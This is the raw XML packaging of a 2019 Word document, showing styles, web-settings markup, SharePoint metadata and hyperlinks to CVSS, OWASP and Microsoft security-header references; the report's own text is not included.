      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA1E9E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000A5DB8"/>
    <w:pPr>
      <w:spacing w:before="480" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C4113"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C1C7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46716">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="341124092">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="411052636">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="436218622">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="451628376">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="779185709">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="113915499">
          <w:marLeft w:val="300"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="375"/>
          <w:marBottom w:val="225"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="936407869">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="442186567">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="730225758">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="291060806">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1564872982">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1002200680">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1283029372">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1287152138">
                                          <w:marLeft w:val="150"/>
                                          <w:marRight w:val="150"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="1899626561">
                                              <w:marLeft w:val="150"/>
                                              <w:marRight w:val="150"/>
                                              <w:marTop w:val="0"/>
                                              <w:marBottom w:val="0"/>
                                              <w:divBdr>
                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="8266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3101503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="908077332">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="981229100">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="984162606">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1142890775">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1244683238">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1371299969">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1455057963">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1552570189">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1574779933">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1589999318">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1635217408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1728068396">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1834445932">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="666323482">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1960990530">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2053142330">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="137116946">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1690527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irst.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0"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hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security" TargetMode="External"/><Relationship Id="rId42"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first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/ie/gg622941(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.msdn.microsoft.com/ie/2008/07/02/ie8-security-part-iv-the-xss-filter/"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https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId45"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owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet"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developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection"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irst.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.0" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Projec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5503fb62-c3ba-4430-912a-988a2ed44837" xsi:nil="true"/>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F0063A0A32704181DC10A94DB4B255" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="83348031ad2488164fda639e1e48018f">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="5503fb62-c3ba-4430-912a-988a2ed44837" xmlns:ns3="http://schemas.microsoft.com/sharepoint/v4" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9df53d7208859a8e1b3267936fa3ff7f" ns2:_="" ns3:_="">
    <xsd:import namespace="5503fb62-c3ba-4430-912a-988a2ed44837"/>
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v4"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:Document_x0020_Type"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3fb62-c3ba-4430-912a-988a2ed44837" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="Document_x0020_Type" ma:index="8" nillable="true" ma:displayName="Document Type" ma:format="Dropdown" ma:internalName="Document_x0020_Type" ma:readOnly="false">
      <xsd:simpleType>
        <xsd:restriction base="dms:Choice">
          <xsd:enumeration value="Execution Document"/>
          <xsd:enumeration value="One-Pager"/>
          <xsd:enumeration value="Executive Presentation"/>
          <xsd:enumeration value="Process Flow"/>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AA4D8-2AC4-4EC0-8CB8-50F7FD644B6F}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="5503fb62-c3ba-4430-912a-988a2ed44837"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v4"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C671F48A-BE2B-40BA-9963-ACD4D68D50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03fb62-c3ba-4430-912a-988a2ed44837"/>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DB6C42-63EA-4668-8996-CF56DC91CDD5}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{31EFF0B6-AED5-480C-ADD1-BFC830BB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6767</Words>
  <Characters>38572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45249</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="30" baseType="variant">
      <vt:variant>
        <vt:i4>1179651</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>54</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://technet.microsoft.com/en-us/library/dd351041(v=exchg.150).aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>structure &lt;http://technet.microsoft.com/en-us/library/dd351041%28v=exchg.150%29.aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>524316</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>51</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://technet.microsoft.com/en-us/library/hh852409.aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>851999</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>48</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://technet.microsoft.com/en-us/library/jj891040.aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060981</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>45</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://msdn.microsoft.com/en-us/library/dd877045(v=exchg.140).aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>786513</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>42</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://technet.microsoft.com/en-us/library/dd351041%28v=exchg.150%29.aspx</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>structure</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2019-06-06T12:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-06T12:57:00Z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0x010100C6F0063A0A32704181DC10A94DB4B255</vt:lpwstr>
  </property>
</Properties>
</file>